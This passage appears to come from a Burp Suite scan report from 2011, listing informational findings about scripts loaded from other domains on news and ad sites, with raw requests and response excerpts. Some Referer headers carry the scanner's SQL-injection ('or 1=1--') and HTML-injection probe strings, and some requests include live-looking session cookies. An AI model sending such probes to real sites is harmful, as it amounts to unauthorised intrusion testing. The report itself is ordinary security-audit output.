Path:   /$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: netscape.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb05.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 15160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/skn/classic_v1/4-err.css" />
<script type="text/javascript" src="http://portal.aolcdn.com/p/v32/63-main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

23.263. http://news.discovery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.discovery.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 62539
Content-Type: text/html; charset=UTF-8
X-ServerId: 192.168.32.151
Content-Language: en-US
Cache-Control: max-age=292
Date: Sun, 30 Jan 2011 02:17:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-equiv
...[SNIP]...
</script>


<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08778"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/20824/nodetag.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

23.264. http://news.sciencemag.org/scienceinsider/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.sciencemag.org
Path:   /scienceinsider/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /scienceinsider/ HTTP/1.1
Host: news.sciencemag.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.11 DAV/2
X-Powered-By: PHP/5.2.11
Connection: close
Content-Type: text/html
Content-Length: 107268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">


<head
...[SNIP]...
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.sciencemag.org/scienceinsider/rsd.xml" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=sciencehabit"></script>
...[SNIP]...
<!-- JS-Kit comment count -->
<script src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...

23.265. http://news.ycombinator.com/newest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.ycombinator.com
Path:   /newest

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newest HTTP/1.1
Host: news.ycombinator.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response


<html><head><link rel="stylesheet" type="text/css" href="http://ycombinator.com/news.css">
<link rel="shortcut icon" href="http://ycombinator.com/favicon.ico">
<script>
function byId(id) {
return document.getElementById(id);
}

function vote(node) {
var v = node.id.split(/_/); // {'up', '123'}
var item = v[1];

// adjust score
var score = byId('score_' + item);
var newscore = parseInt(score.innerHTML) + (v[0] ==
...[SNIP]...
<br>
<script type="text/javascript"
src="http://www.co2stats.com/propres.php?s=1138">
</script>
...[SNIP]...

23.266. http://news.ycombinator.com/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.ycombinator.com
Path:   /news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news HTTP/1.1
Host: news.ycombinator.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response


<html><head><link rel="stylesheet" type="text/css" href="http://ycombinator.com/news.css">
<link rel="shortcut icon" href="http://ycombinator.com/favicon.ico">
<script>
function byId(id) {
return document.getElementById(id);
}

function vote(node) {
var v = node.id.split(/_/); // {'up', '123'}
var item = v[1];

// adjust score
var score = byId('score_' + item);
var newscore = parseInt(score.innerHTML) + (v[0] ==
...[SNIP]...
<br>
<script type="text/javascript"
src="http://www.co2stats.com/propres.php?s=1138">
</script>
...[SNIP]...

23.267. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc03049.popsci.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05? HTTP/1.1
Host: oasc03049.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:01 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13662
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/973660255/Bottom/WorldPub/PSC_CSX_Home_Geo_728x90_Jan11/PSC_CSX_Home_Geo_728x90_Jan11.html/72634857383031466e4e454142726a6b?;ord=973660255?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
</A>');
}
if (position == 'Right1') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/16016899/Right1/WorldPub/PSC_AutoZone_Home_300x250/PSC_AutoZone_Home_300x250.html/72634857383031466e4e454142726a6b?;ord=16016899?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
</div>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
</div>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

23.268. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.scientificamerican.com
Path:   /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60 HTTP/1.1
Host: oascentral.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:14:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 7042
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1242882707/Right1/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_300x250.html/72634857383031466e495541436f5532?http://$$&ord=1242882707"></script>
...[SNIP]...
</noscript>\n');
}
if (position == 'Right2') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-apac.doubleclick.net/adj/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;click0=http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1016552314/Right2/sciam.com/p_2010-12_Volt_CoBrand_ros/p_2010-12_Volt_Cobrand_ros_300x250.html/72634857383031466e495541436f5532?;ord=1016552314?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
</NOSCRIPT>\n');
}
if (position == 'Top') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2009818&PluID=0&w=728&h=90&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1095766167/Top/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_728x90.html/72634857383031466e495541436f5532?http://$$&ord=1095766167"></script>
...[SNIP]...

23.269. http://openchannel.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openchannel.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: openchannel.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=286
Date: Sun, 30 Jan 2011 02:17:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158591

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Open Channel</title>
<met
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/c3a6610934e740a9e1b451a9d82b6419a429c9c1.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.270. http://photoblog.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=114
Date: Sun, 30 Jan 2011 02:17:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 98404

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fe8eea9fd9019c30471999651230cb61bfef5ba8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.271. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

Summary

Severity:   Information
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=19
Date: Sat, 29 Jan 2011 23:50:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176986

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.272. http://photoblog.msnbc.redacted/_vine/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /_vine/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_vine/a HTTP/1.1
